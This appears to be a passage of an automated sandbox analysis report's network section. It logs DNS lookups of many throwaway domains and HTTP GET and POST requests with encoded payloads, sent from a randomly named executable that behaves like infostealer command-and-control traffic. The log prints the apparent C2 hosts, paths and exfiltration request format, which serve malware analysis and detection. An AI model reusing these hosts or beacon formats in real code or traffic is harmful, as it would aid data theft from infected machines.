                                                Aug 27, 2024 08:05:18.042381048 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042391062 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042512894 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:18.042543888 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042651892 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:18.042675972 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042686939 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042695999 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042704105 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042712927 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042742014 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042751074 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042879105 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:18.042912960 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042969942 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.042979002 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.043164968 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.043175936 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.043276072 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.043356895 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.281773090 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.281785011 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.281954050 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.282094002 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.282104969 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.282206059 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.282217026 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.282325029 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.282458067 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.282469034 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.282478094 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.282485962 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.337784052 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.337878942 CEST8049930185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:18.338166952 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:19.078474998 CEST4993080192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:20.096138954 CEST4993180192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:20.335377932 CEST8049931185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:20.335674047 CEST4993180192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:20.341361046 CEST4993180192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:20.580571890 CEST8049931185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:20.632642031 CEST8049931185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:20.632745981 CEST8049931185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:05:20.632982969 CEST4993180192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:20.634715080 CEST4993180192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:05:20.873842001 CEST8049931185.230.15.3192.168.11.20

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 27, 2024 07:57:27.044660091 CEST5688953192.168.11.201.1.1.1
                                                Aug 27, 2024 07:57:27.288184881 CEST53568891.1.1.1192.168.11.20
                                                Aug 27, 2024 07:58:02.104042053 CEST6516353192.168.11.201.1.1.1
                                                Aug 27, 2024 07:58:02.215864897 CEST53651631.1.1.1192.168.11.20
                                                Aug 27, 2024 07:58:22.483973980 CEST5048953192.168.11.201.1.1.1
                                                Aug 27, 2024 07:58:23.497296095 CEST5048953192.168.11.209.9.9.9
                                                Aug 27, 2024 07:58:24.091295004 CEST53504899.9.9.9192.168.11.20
                                                Aug 27, 2024 07:58:25.834355116 CEST53504891.1.1.1192.168.11.20
                                                Aug 27, 2024 07:58:38.574615955 CEST5572053192.168.11.209.9.9.9
                                                Aug 27, 2024 07:58:38.680150032 CEST53557209.9.9.9192.168.11.20
                                                Aug 27, 2024 07:58:46.744371891 CEST6238653192.168.11.209.9.9.9
                                                Aug 27, 2024 07:58:46.891068935 CEST53623869.9.9.9192.168.11.20
                                                Aug 27, 2024 07:59:00.178956032 CEST5104653192.168.11.209.9.9.9
                                                Aug 27, 2024 07:59:00.465051889 CEST53510469.9.9.9192.168.11.20
                                                Aug 27, 2024 07:59:14.738310099 CEST6395153192.168.11.209.9.9.9
                                                Aug 27, 2024 07:59:14.857050896 CEST53639519.9.9.9192.168.11.20
                                                Aug 27, 2024 07:59:28.000693083 CEST6079753192.168.11.209.9.9.9
                                                Aug 27, 2024 07:59:28.104723930 CEST53607979.9.9.9192.168.11.20
                                                Aug 27, 2024 07:59:41.419615030 CEST5852453192.168.11.209.9.9.9
                                                Aug 27, 2024 07:59:41.594192982 CEST53585249.9.9.9192.168.11.20
                                                Aug 27, 2024 07:59:55.213896990 CEST6451353192.168.11.209.9.9.9
                                                Aug 27, 2024 07:59:55.552339077 CEST53645139.9.9.9192.168.11.20
                                                Aug 27, 2024 08:00:09.492700100 CEST6155953192.168.11.209.9.9.9
                                                Aug 27, 2024 08:00:09.608885050 CEST53615599.9.9.9192.168.11.20
                                                Aug 27, 2024 08:00:23.816513062 CEST6050753192.168.11.209.9.9.9
                                                Aug 27, 2024 08:00:23.919327974 CEST53605079.9.9.9192.168.11.20
                                                Aug 27, 2024 08:00:50.919940948 CEST5581553192.168.11.209.9.9.9
                                                Aug 27, 2024 08:00:51.366111994 CEST53558159.9.9.9192.168.11.20
                                                Aug 27, 2024 08:01:05.120215893 CEST6428153192.168.11.209.9.9.9
                                                Aug 27, 2024 08:01:05.348082066 CEST53642819.9.9.9192.168.11.20
                                                Aug 27, 2024 08:01:18.851984978 CEST5566353192.168.11.209.9.9.9
                                                Aug 27, 2024 08:01:18.955868959 CEST53556639.9.9.9192.168.11.20
                                                Aug 27, 2024 08:01:32.114161968 CEST5719953192.168.11.209.9.9.9
                                                Aug 27, 2024 08:01:32.252120972 CEST53571999.9.9.9192.168.11.20
                                                Aug 27, 2024 08:03:27.338119984 CEST5486353192.168.11.209.9.9.9
                                                Aug 27, 2024 08:03:27.439057112 CEST53548639.9.9.9192.168.11.20
                                                Aug 27, 2024 08:05:25.642030954 CEST5799553192.168.11.209.9.9.9
                                                Aug 27, 2024 08:05:25.845122099 CEST53579959.9.9.9192.168.11.20

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Aug 27, 2024 07:57:27.044660091 CEST192.168.11.201.1.1.10xbd5fStandard query (0)www.groupriam.comA (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:58:02.104042053 CEST192.168.11.201.1.1.10x8967Standard query (0)www.foundation-repair.bizA (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:58:22.483973980 CEST192.168.11.201.1.1.10x8153Standard query (0)www.asa-malukuutara.comA (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:58:23.497296095 CEST192.168.11.209.9.9.90x8153Standard query (0)www.asa-malukuutara.comA (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:58:38.574615955 CEST192.168.11.209.9.9.90xfa98Standard query (0)www.sedezne-blazine.shopA (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:58:46.744371891 CEST192.168.11.209.9.9.90xa31aStandard query (0)www.meetfactory.bizA (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:59:00.178956032 CEST192.168.11.209.9.9.90xd32aStandard query (0)www.518729.xyzA (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:59:14.738310099 CEST192.168.11.209.9.9.90x418fStandard query (0)www.cachsoicautdtc.bestA (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:59:28.000693083 CEST192.168.11.209.9.9.90x7d62Standard query (0)www.itemfilterhub.shopA (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:59:41.419615030 CEST192.168.11.209.9.9.90xf5ceStandard query (0)www.bullbord.topA (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:59:55.213896990 CEST192.168.11.209.9.9.90xad47Standard query (0)www.cannulafactory.topA (IP address)IN (0x0001)false
                                                Aug 27, 2024 08:00:09.492700100 CEST192.168.11.209.9.9.90x6d96Standard query (0)www.7ddw.topA (IP address)IN (0x0001)false
                                                Aug 27, 2024 08:00:23.816513062 CEST192.168.11.209.9.9.90x2c1Standard query (0)www.home-check.shopA (IP address)IN (0x0001)false
                                                Aug 27, 2024 08:00:50.919940948 CEST192.168.11.209.9.9.90xd5f2Standard query (0)www.emeluzunmoda.onlineA (IP address)IN (0x0001)false
                                                Aug 27, 2024 08:01:05.120215893 CEST192.168.11.209.9.9.90x5d3fStandard query (0)www.ayypromo.shopA (IP address)IN (0x0001)false
                                                Aug 27, 2024 08:01:18.851984978 CEST192.168.11.209.9.9.90xc964Standard query (0)www.magicface.shopA (IP address)IN (0x0001)false
                                                Aug 27, 2024 08:01:32.114161968 CEST192.168.11.209.9.9.90xb82cStandard query (0)www.hypepgbet.onlineA (IP address)IN (0x0001)false
                                                Aug 27, 2024 08:03:27.338119984 CEST192.168.11.209.9.9.90xa674Standard query (0)www.sedezne-blazine.shopA (IP address)IN (0x0001)false
                                                Aug 27, 2024 08:05:25.642030954 CEST192.168.11.209.9.9.90xdf5cStandard query (0)www.multfiber.netA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Aug 27, 2024 07:57:27.288184881 CEST1.1.1.1192.168.11.200xbd5fNo error (0)www.groupriam.comgroupriam.comCNAME (Canonical name)IN (0x0001)false
                                                Aug 27, 2024 07:57:27.288184881 CEST1.1.1.1192.168.11.200xbd5fNo error (0)groupriam.com199.103.62.205A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:58:02.215864897 CEST1.1.1.1192.168.11.200x8967No error (0)www.foundation-repair.biz199.59.243.226A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:58:24.091295004 CEST9.9.9.9192.168.11.200x8153No error (0)www.asa-malukuutara.comasa-malukuutara.comCNAME (Canonical name)IN (0x0001)false
                                                Aug 27, 2024 07:58:24.091295004 CEST9.9.9.9192.168.11.200x8153No error (0)asa-malukuutara.com103.247.8.53A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:58:25.834355116 CEST1.1.1.1192.168.11.200x8153No error (0)www.asa-malukuutara.comasa-malukuutara.comCNAME (Canonical name)IN (0x0001)false
                                                Aug 27, 2024 07:58:25.834355116 CEST1.1.1.1192.168.11.200x8153No error (0)asa-malukuutara.com103.247.8.53A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:58:38.680150032 CEST9.9.9.9192.168.11.200xfa98Name error (3)www.sedezne-blazine.shopnonenoneA (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:58:46.891068935 CEST9.9.9.9192.168.11.200xa31aNo error (0)www.meetfactory.biz96.126.123.244A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:58:46.891068935 CEST9.9.9.9192.168.11.200xa31aNo error (0)www.meetfactory.biz198.58.118.167A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:58:46.891068935 CEST9.9.9.9192.168.11.200xa31aNo error (0)www.meetfactory.biz72.14.185.43A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:58:46.891068935 CEST9.9.9.9192.168.11.200xa31aNo error (0)www.meetfactory.biz45.33.2.79A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:58:46.891068935 CEST9.9.9.9192.168.11.200xa31aNo error (0)www.meetfactory.biz45.33.23.183A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:58:46.891068935 CEST9.9.9.9192.168.11.200xa31aNo error (0)www.meetfactory.biz45.33.30.197A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:58:46.891068935 CEST9.9.9.9192.168.11.200xa31aNo error (0)www.meetfactory.biz45.33.20.235A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:58:46.891068935 CEST9.9.9.9192.168.11.200xa31aNo error (0)www.meetfactory.biz45.79.19.196A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:58:46.891068935 CEST9.9.9.9192.168.11.200xa31aNo error (0)www.meetfactory.biz45.56.79.23A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:58:46.891068935 CEST9.9.9.9192.168.11.200xa31aNo error (0)www.meetfactory.biz173.255.194.134A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:58:46.891068935 CEST9.9.9.9192.168.11.200xa31aNo error (0)www.meetfactory.biz72.14.178.174A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:58:46.891068935 CEST9.9.9.9192.168.11.200xa31aNo error (0)www.meetfactory.biz45.33.18.44A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:59:00.465051889 CEST9.9.9.9192.168.11.200xd32aNo error (0)www.518729.xyz23.231.158.3A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:59:14.857050896 CEST9.9.9.9192.168.11.200x418fNo error (0)www.cachsoicautdtc.best172.67.191.241A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:59:14.857050896 CEST9.9.9.9192.168.11.200x418fNo error (0)www.cachsoicautdtc.best104.21.84.119A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:59:28.104723930 CEST9.9.9.9192.168.11.200x7d62No error (0)www.itemfilterhub.shop172.67.166.145A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:59:28.104723930 CEST9.9.9.9192.168.11.200x7d62No error (0)www.itemfilterhub.shop104.21.50.202A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:59:41.594192982 CEST9.9.9.9192.168.11.200xf5ceNo error (0)www.bullbord.top203.161.46.205A (IP address)IN (0x0001)false
                                                Aug 27, 2024 07:59:55.552339077 CEST9.9.9.9192.168.11.200xad47No error (0)www.cannulafactory.top18.183.3.45A (IP address)IN (0x0001)false
                                                Aug 27, 2024 08:00:09.608885050 CEST9.9.9.9192.168.11.200x6d96No error (0)www.7ddw.top7ddw.topCNAME (Canonical name)IN (0x0001)false
                                                Aug 27, 2024 08:00:09.608885050 CEST9.9.9.9192.168.11.200x6d96No error (0)7ddw.top154.23.184.207A (IP address)IN (0x0001)false
                                                Aug 27, 2024 08:00:23.919327974 CEST9.9.9.9192.168.11.200x2c1No error (0)www.home-check.shop185.230.15.3A (IP address)IN (0x0001)false
                                                Aug 27, 2024 08:00:51.366111994 CEST9.9.9.9192.168.11.200xd5f2No error (0)www.emeluzunmoda.onlineredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                Aug 27, 2024 08:00:51.366111994 CEST9.9.9.9192.168.11.200xd5f2No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                Aug 27, 2024 08:00:51.366111994 CEST9.9.9.9192.168.11.200xd5f2No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                Aug 27, 2024 08:01:05.348082066 CEST9.9.9.9192.168.11.200x5d3fNo error (0)www.ayypromo.shop176.57.64.102A (IP address)IN (0x0001)false
                                                Aug 27, 2024 08:01:18.955868959 CEST9.9.9.9192.168.11.200xc964No error (0)www.magicface.shop76.223.54.146A (IP address)IN (0x0001)false
                                                Aug 27, 2024 08:01:18.955868959 CEST9.9.9.9192.168.11.200xc964No error (0)www.magicface.shop13.248.169.48A (IP address)IN (0x0001)false
                                                Aug 27, 2024 08:01:32.252120972 CEST9.9.9.9192.168.11.200xb82cNo error (0)www.hypepgbet.online82.112.244.92A (IP address)IN (0x0001)false
                                                Aug 27, 2024 08:03:27.439057112 CEST9.9.9.9192.168.11.200xa674Name error (3)www.sedezne-blazine.shopnonenoneA (IP address)IN (0x0001)false
                                                Aug 27, 2024 08:05:25.845122099 CEST9.9.9.9192.168.11.200xdf5cNo error (0)www.multfiber.netmultfiber.netCNAME (Canonical name)IN (0x0001)false
                                                Aug 27, 2024 08:05:25.845122099 CEST9.9.9.9192.168.11.200xdf5cNo error (0)multfiber.net84.32.84.32A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • www.groupriam.com
                                                • www.foundation-repair.biz
                                                • www.asa-malukuutara.com
                                                • www.meetfactory.biz
                                                • www.518729.xyz
                                                • www.cachsoicautdtc.best
                                                • www.itemfilterhub.shop
                                                • www.bullbord.top
                                                • www.cannulafactory.top
                                                • www.7ddw.top
                                                • www.home-check.shop
                                                • www.emeluzunmoda.online
                                                • www.ayypromo.shop
                                                • www.magicface.shop

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.11.2049841199.59.243.226807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:58:02.327053070 CEST555OUTGET /enra/?wXB=brv4Erb&ij60MtY=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ= HTTP/1.1
                                                Host: www.foundation-repair.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 07:58:02.430035114 CEST1200INHTTP/1.1 200 OK
                                                date: Tue, 27 Aug 2024 05:58:01 GMT
                                                content-type: text/html; charset=utf-8
                                                content-length: 1478
                                                x-request-id: 58a53c6f-ee4c-4d7c-b6e5-be9123508806
                                                cache-control: no-store, max-age=0
                                                accept-ch: sec-ch-prefers-color-scheme
                                                critical-ch: sec-ch-prefers-color-scheme
                                                vary: sec-ch-prefers-color-scheme
                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Im6T6/pqCTudfemr3/Ry3QOMsMpidAGuIZS152vKDAPS35jIwkuAAyjevEKaV89FkqL+9D93AJ/s2twwhb4hMA==
                                                set-cookie: parking_session=58a53c6f-ee4c-4d7c-b6e5-be9123508806; expires=Tue, 27 Aug 2024 06:13:02 GMT; path=/
                                                connection: close
                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 49 6d 36 54 36 2f 70 71 43 54 75 64 66 65 6d 72 33 2f 52 79 33 51 4f 4d 73 4d 70 69 64 41 47 75 49 5a 53 31 35 32 76 4b 44 41 50 53 33 35 6a 49 77 6b 75 41 41 79 6a 65 76 45 4b 61 56 38 39 46 6b 71 4c 2b 39 44 39 33 41 4a 2f 73 32 74 77 77 68 62 34 68 4d 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Im6T6/pqCTudfemr3/Ry3QOMsMpidAGuIZS152vKDAPS35jIwkuAAyjevEKaV89FkqL+9D93AJ/s2twwhb4hMA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI1
                                                Aug 27, 2024 07:58:02.430104971 CEST967INData Raw: 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77
                                                Data Ascii: 2P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNThhNTNjNmYtZWU0Yy00ZDdjLWI2ZTUtYmU5MTIzNT


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.11.2049842103.247.8.53807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:58:24.452451944 CEST835OUTPOST /21hf/ HTTP/1.1
                                                Host: www.asa-malukuutara.com
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.asa-malukuutara.com
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.asa-malukuutara.com/21hf/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 6b 33 6c 72 53 2f 54 35 54 32 79 36 31 58 37 4c 61 69 54 6b 6b 6c 53 4c 43 52 35 68 63 4b 2f 46 54 61 30 6e 76 50 71 6b 6c 63 6a 50 37 41 45 58 44 77 75 52 73 75 78 35 51 31 6e 65 71 42 58 58 68 45 4f 51 54 4d 47 58 46 61 37 4c 36 51 50 45 42 4d 6c 36 33 51 56 35 77 6b 4b 59 74 58 41 77 76 4a 5a 61 34 39 37 71 6e 50 6a 49 31 58 6d 32 55 71 6e 45 31 4c 75 6a 34 56 66 54 55 68 48 6b 7a 61 50 72 42 37 4b 46 56 76 67 64 6f 7a 68 2b 67 6f 77 39 63 54 59 76 5a 53 5a 5a 31 34 62 69 73 2b 6c 62 62 49 33 51 77 78 68 5a 32 36 46 42 4c 35 43 49 70 6d 44 4f 4f 79 75 65 4e 35 56 77 4f 41 3d 3d
                                                Data Ascii: ij60MtY=k3lrS/T5T2y61X7LaiTkklSLCR5hcK/FTa0nvPqklcjP7AEXDwuRsux5Q1neqBXXhEOQTMGXFa7L6QPEBMl63QV5wkKYtXAwvJZa497qnPjI1Xm2UqnE1Luj4VfTUhHkzaPrB7KFVvgdozh+gow9cTYvZSZZ14bis+lbbI3QwxhZ26FBL5CIpmDOOyueN5VwOA==
                                                Aug 27, 2024 07:58:24.993861914 CEST1289INHTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 05:58:24 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Content-Encoding: br
                                                Content-Length: 12523
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 53 06 02 41 11 a9 49 3f 04 54 04 c6 4d 7c ac f3 7c ff 99 a9 7d 67 e9 72 7a 86 2b 16 e1 00 20 00 ae 22 43 f5 77 9c 5e 5c 93 4c ba e2 e4 6f b1 4b 03 91 90 04 9b 22 39 00 b4 b8 d9 fc ff fd a5 d5 64 a6 61 0a 67 16 08 65 b7 b4 04 1c da f7 de f7 5e f7 87 aa 3d bf 24 79 b6 24 d9 e7 94 2c f7 1e 19 7a 8f 64 e8 e6 f7 ee 83 ff 0b c5 06 99 b8 7b c1 f6 10 60 16 2c 62 92 6c 12 d7 70 79 7a 61 80 c2 89 37 a2 20 4a f6 31 4c 6b b7 bf cf ba eb 12 44 44 45 40 4d da 7b 89 cb 63 f3 9a 60 a9 46 79 31 91 a9 e1 8c 0d fd 41 ec 93 bc 55 22 99 ef ab 0c d5 66 f7 42 62 1b 43 c9 29 20 75 5b c6 d4 b2 d9 bd ee 17 39 09 57 03 44 62 5d 94 80 c1 d5 9c 6b c0 a4 8b 57 48 77 f4 c7 e3 1c 07 73 4f 8b 42 bc 6f ac 50 ce cb b5 c4 73 59 58 0a 88 1c da 0d 45 5d 15 f5 10 81 04 53 06 57 2a 81 4b 7f 8b 17 05 60 a3 5b 7c 4c 2c 0e ea b2 1b 8c 41 3a 24 34 2e 92 1a 2f 02 53 92 81 83 db a0 eb 3d 70 2c 82 e2 fb c7 13 a2 84 bb c7 3b fa e5 ee f3 8f ef fb 3c 7b 49 f3 0f ad e9 5e c1 ea b6 5a 34 9d 43 7a 19 5b ed eb fd 62 b7 0d 2f 3d 0c 95 53 f4 a0 da e3 eb [TRUNCATED]
                                                Data Ascii: SAI?TM||}grz+ "Cw^\LoK"9dage^=$y$,zd{`,blpyza7 J1LkDDE@M{c`Fy1AU"fBbC) u[9WDb]kWHwsOBoPsYXE]SW*K`[|L,A:$4./S=p,;<{I^Z4Cz[b/=SUS<(2i\!o);nb@.b~#D "fynmn)t<u4&{i)D<"aEOa&/|AQ"v8Giv~mo2j8Oyv)|q1tJW~JYr^h'q0)r}om8%0O{]{$m|yWh"O-?O{U;^-/i<N+x*}';)*Z$vu:`w}'%/|$Uof;R^l?*LlBj*5TM*?Ow?qX+Q2mEO&cFOy:TeK[Cko.r%+6[ZMtAmMo(KM9&A-]\w-"\ftS\4N
                                                Aug 27, 2024 07:58:24.993967056 CEST1289INData Raw: b4 fa 6e 9b 21 3c 61 29 88 9c bf fb 16 2a c6 88 ad d0 ac 3f d0 b5 6a 0d ba aa c4 fc cd fb 2d fc ab b7 af da ea 22 53 1f eb 7e d0 37 37 aa 43 0a cf 71 71 e1 ae 06 8b 7e 29 d3 a3 5f b7 db e6 3f be 2f ac 51 a0 72 5d 96 48 38 2e 8c a2 90 a0 d2 3c 05
                                                Data Ascii: n!<a)*?j-"S~77Cqq~)_?/Qr]H8.<a*[^n|"nVo-%u}+I_&t|? Wsp;kT8'z"t8y|UZ|K+M<kVS9F`_QqZ
                                                Aug 27, 2024 07:58:24.994029999 CEST1289INData Raw: 2c 40 4a 57 cf 03 75 e0 af 74 09 15 aa 70 f7 f9 74 de 2a e7 a9 24 d0 35 12 dd af 4d 31 22 dc d6 56 44 7b 53 b2 02 ee bd f6 c1 e2 8b 10 6c 19 b1 34 8f 4f 39 e3 d1 b2 4d 58 1a 45 f4 f0 59 40 30 29 52 5c 98 a5 70 7a 6d f7 39 e3 f1 49 b0 2c ca fe 10
                                                Data Ascii: ,@JWutpt*$5M1"VD{Sl4O9MXEY@0)R\pzm9I,m2.=2hmbO7:ekX,K/K9|WcE,x"9A^So'9/?S~r}O+]-J""!dCwt%kwBvJo.cp*=1i
